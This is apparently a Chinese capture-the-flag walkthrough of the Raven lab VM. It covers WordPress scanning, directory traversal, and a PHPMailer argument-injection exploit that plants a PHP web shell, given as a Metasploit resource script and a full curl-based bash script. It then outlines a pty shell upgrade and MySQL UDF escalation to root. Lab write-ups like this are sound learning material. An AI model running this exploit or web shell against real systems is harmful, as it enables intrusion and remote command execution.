info:

http://192.168.241.128/wordpress/?attachment_id=11
wpscan扫描了这个目录，获得flag3

http://raven.local/vendor/PATH
发现目录遍历，获得flag1

思路

无弱密码；有0day漏洞，但没有exp；无脆弱的wordpress插件

查看wp后，就是自己没有发现目录遍历漏洞=。=

http://raven.local/vendor/security.md 暗示了phpmailer插件版本漏洞

touch test.rc

use exploit/multi/http/phpmailer_arg_injection
set RHOST 192.168.241.128
set TARGETURI /contact.php
set WEB_ROOT /var/www/html/
run

msfconsole -r test.rc
反弹shell失败。。。

exp.sh

#!/bin/bash

TARGET=http://raven.local/contact.php

DOCROOT=/var/www/html
FILENAME=backdoor.php
LOCATION=$DOCROOT/$FILENAME

STATUS=$(curl -s \
              --data-urlencode "name=Hackerman" \
              --data-urlencode "email=\"hackerman\\\" -oQ/tmp -X$LOCATION blah\"@badguy.com" \
              --data-urlencode "message=<?php echo shell_exec(\$_GET['cmd']); ?>" \
              --data-urlencode "action=submit" \
              $TARGET | sed -r '146!d')

if grep 'instantiate' &>/dev/null <<<"$STATUS"; then
  echo "[+] Check ${LOCATION}?cmd=[shell command, e.g. id]"
else
  echo "[!] Exploit failed"
fi

运行以上exp，成功获得一个webshell，权限为www-data

接下来用php反弹shell，如同这篇文章

python -c ‘import pty; pty.spawn(“/bin/bash”)’

之后，web目录泄露mysql密码，得到mysql普通权限。
然后上传udf源代码，执行安装，就可以使用do_system()函数，以root权限执行命令。
https://whale3070.github.io/training/2018/12/11/x/

总结

之前用searchsploit 找到了关于phpmailer的exp，php、bash、python的exp，都执行失败了。

看到过一个问题，**web渗透该如何继续提升？**除非遇到一样的web站点，该搞不下来的网站，还是搞不下来。

我认为应该用代码能力，写工具，尽可能扩大目标攻击面（只有知道，才能看到弱点），然后精力放在漏洞挖掘上。

而不是脚本小子运用已知exp对漏洞进行利用。

就好像我知道锁A、B、C，我有钥匙a，刚好Aa能配上，我就能进入系统。

经过验证，搞不下来的站点，除非有0day漏洞，那就证明了该站点很安全。

继续提升代码能力以及漏洞挖掘能力吧…